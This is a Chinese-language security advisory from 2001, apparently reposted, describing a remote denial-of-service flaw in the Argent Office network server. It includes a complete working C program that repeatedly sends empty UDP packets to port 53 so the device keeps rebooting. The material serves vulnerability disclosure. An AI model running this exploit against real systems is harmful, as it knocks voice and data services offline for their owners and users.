Avaya Argent Office 远程拒绝服务漏洞

发布日期：2001-08-07
更新日期：2001-08-08

受影响系统：

Network Alchemy(Avaya) Argent Office

描述：

---

Network Alchemy公司开发的Argent Office产品是一套综合了语音分组交换、网络数据连
接以及拨入服务功能的网络服务器。

它存在一个远程拒绝服务问题，本地网络内部的用户可以通过向它的53端口发送UDP报文
来使它重启。如果攻击者重复地发送报文，就可能造成持续的拒绝服务攻击。


<*来源：Jacek Lipkowski (sq5bpf@acid.ch.pw.edu.pl) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jacek Lipkowski (sq5bpf@acid.ch.pw.edu.pl)提供了下列测试方法：

/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent *host;
int s;

s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s==-1) { perror("socket()"); exit(1); }
host=gethostbyname(argv[1]);
if (host==0) { herror("gethostbyname"); exit(1); }
memcpy(&addr.sin_addr,host->h_addr,host->h_length);
addr.sin_port=htons(53);
addr.sin_family=AF_INET;
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
{
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
}
close(s);
}


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.midlandcomms.co.uk/argent_office.htm

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有